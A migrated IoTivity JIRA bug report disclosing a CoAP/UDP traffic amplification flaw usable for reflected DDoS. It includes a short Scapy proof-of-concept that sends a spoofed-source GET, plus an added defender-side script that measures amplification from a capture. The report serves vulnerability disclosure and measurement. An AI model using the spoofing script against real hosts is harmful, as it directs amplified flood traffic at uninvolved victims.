Traffic amplification of UDP packets
The IoTivity server in its current version (HEAD-5349dadc, taken from GitHub) can be used to perform Distributed Denial of Service attacks, acting as a network amplifier with spoofing of the source IP address.
After receiving a CoAP GET message (53 bytes long), the IoTivity server responds with 6 CoAP packets (each 62 bytes long):
###[ CoAP ]###
ver = 1L
type = CON
tkl = 0L
code = 4.01 Unauthorized
msg_id = 1881
token = ''
options = [('Uri-Path', 'test')]
paymark = ''
Together, all response packets total 372 bytes, which gives a 600% amplification factor (calculated as: size_of_output/size_of_input - 1).
The server responds to the IP address from the first packet without getting any concurrent response from the client, so this request can be used for Distributed Denial of Service with spoofing of the source IP address.
The issue was tested and reproduced for the following example IoTivity server applications:
- devicediscoveryserver
- fridgeserver
- garageserver
- groupserver
- lightserver
- presenceserver
- roomserver
- simpleclientserver
- simpleserver
- simpleserverHQ
The issue can be reproduced using the following Python 2 script (requires the Scapy library and sudo to spoof the source IP address):
import sys
from scapy.all import *
IOTIVITY_PAYLOAD = "40010759b474657374"
data = IOTIVITY_PAYLOAD.decode('hex')
packet = IP(src=sys.argv[1], dst=sys.argv[3])/UDP(sport=int(sys.argv[2]), dport=5683)/Raw(data)
sr(packet, timeout=5, multi=1)
Execution of the script:
sudo python iotivity_test.py src_ip src_port dst_ip
(where src_ip and src_port are the IP and port of the spoofed source client, and dst_ip is the IP of the tested IoTivity server on port 5683)
e.g.:
sudo python iotivity_test.py 1.1.1.1 50000 192.168.0.101
For the IoTivity example application started with the following command on a server with IP=192.168.0.101:
./simpleserver
CoAP responses will be sent to 1.1.1.1:50000.
JIRA migration meta data
- JIRA Issue ID: IOT-3267
- Reporter: cvereporting
- Assignee: avolkov
- Creator: cvereporting
- Created at: 2019-02-15T08:13:08.000-0800
- Found in Version: Current (HEAD-5349dadc)
- Fix in Version: None
- Issue Severity: Major
- Reproducibility: Always (100%)
- Operating System: None
- Hardware/ OEM Platform: None
- External URL: None
- Bugzilla ID: None
- Product: None
- Status: Reopened
- Components: Primitive Service
- Priority: P2
- Due Date: None
- Issue Type: Bug
END of JIRA migration meta data
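To measure this amplification from a capture on the defender's side, the following added example (not part of the original report or of the IoTivity code) decodes the CoAP header and sums output bytes per message ID using the report's formula. It assumes responses reuse the request's message ID, as in the dump above; the function names are hypothetical and the sample capture is constructed from the sizes given in the report.

```python
import struct
from collections import defaultdict

TYPES = ("CON", "NON", "ACK", "RST")

def parse_coap(data):
    """Decode the 4-byte CoAP header and short-form options (RFC 7252, section 3)."""
    if len(data) < 4:
        raise ValueError("short CoAP header")
    b0, code, msg_id = struct.unpack("!BBH", data[:4])
    tkl = b0 & 0x0F
    if b0 >> 6 != 1 or tkl > 8 or len(data) < 4 + tkl:
        raise ValueError("malformed CoAP header")
    pos, number, options = 4 + tkl, 0, []
    while pos < len(data) and data[pos] != 0xFF:  # 0xFF is the payload marker
        delta, length = data[pos] >> 4, data[pos] & 0x0F
        pos += 1
        if delta > 12 or length > 12 or pos + length > len(data):
            raise ValueError("extended or truncated option, not handled here")
        number += delta
        options.append((number, data[pos:pos + length]))
        pos += length
    return {"type": TYPES[(b0 >> 4) & 3], "code": "%d.%02d" % (code >> 5, code & 31),
            "msg_id": msg_id, "options": options}

def amplification_by_exchange(packets):
    """packets: (wire_size, coap_bytes) pairs. Returns {msg_id: factor} using the
    report's formula size_of_output / size_of_input - 1."""
    sent, received = defaultdict(int), defaultdict(int)
    for size, raw in packets:
        msg = parse_coap(raw)
        # Code class 0 other than 0.00 Empty is a request; anything else counts as output.
        is_request = msg["code"].startswith("0.") and msg["code"] != "0.00"
        (sent if is_request else received)[msg["msg_id"]] += size
    return {mid: received[mid] / sent[mid] - 1 for mid in sent}

# Request bytes are the payload from the report; the response bytes are constructed
# from the dump's fields (CON, 4.01, msg_id 1881, Uri-Path "test"). Sizes are the
# lengths the report gives: one 53-byte request, six 62-byte responses.
REQUEST = bytes.fromhex("40010759b474657374")
RESPONSE = bytes.fromhex("40810759b474657374")
CAPTURE = [(53, REQUEST)] + [(62, RESPONSE)] * 6

if __name__ == "__main__":
    for mid, factor in amplification_by_exchange(CAPTURE).items():
        print("msg_id %d: amplification %.0f%%" % (mid, factor * 100))
```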